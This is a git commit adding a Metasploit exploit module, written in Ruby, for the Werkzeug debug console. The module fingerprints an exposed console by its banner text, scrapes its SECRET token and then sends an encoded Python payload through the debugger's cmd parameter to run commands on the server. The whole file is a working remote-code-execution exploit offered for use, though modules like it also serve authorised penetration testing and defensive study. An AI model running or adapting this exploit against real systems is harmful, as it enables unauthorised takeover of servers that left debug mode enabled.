Initial add

2015-07-10 21:13:12 -04:00 · 2015-07-10 21:13:12 -04:00 · bff92f2304
parent 1d50bda609
commit bff92f2304
1 changed files with 79 additions and 0 deletions
--- a/modules/exploits/multi/http/werkzeug_debug_rce.rb
+++ b/modules/exploits/multi/http/werkzeug_debug_rce.rb
@ -0,0 +1,79 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize
+    super(
+      'Name'        => 'Werkzeug Debug Shell Command Execution',
+      'Description' => %q{
+        This module will exploit the Werkzeug debug console to put down a
+        python shell.  This debugger "must never be used on production
+        machines", but sometimes slips passed testing.
+        Tested against:
+            0.9.6 on Debian
+            0.10  on CentOS
+      },
+      'Author'      => 'h00die <mike[at]shorebreaksecurity.com>',
+      'References'  =>
+          [
+            [ 'Website', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger']
+          ],
+      'License'     => MSF_LICENSE,
+      'Platform'       => ['python'],
+      'Targets'        => [[ 'werkzeug 0.10 and older', { }]],
+      'Arch'           => ARCH_PYTHON,
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jun 28 2015',
+    )
+    register_options(
+      [
+        OptString.new('URI',[true,'URI to the console','/console'])
+      ], self.class
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(datastore['URI'])
+    })
+    #https://github.com/mitsuhiko/werkzeug/blob/master/werkzeug/debug/tbtools.py#L67
+    if (res and res.body =~ /Brought to you by <strong class="arthur">DON'T PANIC<\/strong>, your\n        friendly Werkzeug powered traceback interpreter./)
+      return Exploit::CheckCode::Vulnerable
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    #first we need to get the SECRET code
+    secret = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(datastore['URI'])
+    })
+    if (secret and secret.body =~ /SECRET = "([a-zA-Z0-9]{20})";/)
+      secret = secret.body.match(/SECRET = "([a-zA-Z0-9]{20})";/).captures[0]
+      vprint_status("Secret Code: #{secret}")
+      res = send_request_cgi({
+          'method'   => 'GET',
+          'uri'      => normalize_uri(datastore['URI']),
+          'vars_get' => {
+              '__debugger__' => 'yes',
+              'cmd' => payload.encoded,
+              'frm' => '0',
+              's' => secret
+          }
+      })
+    else
+      print_error("Secret code not detected.")
+    end
+  end
+end
+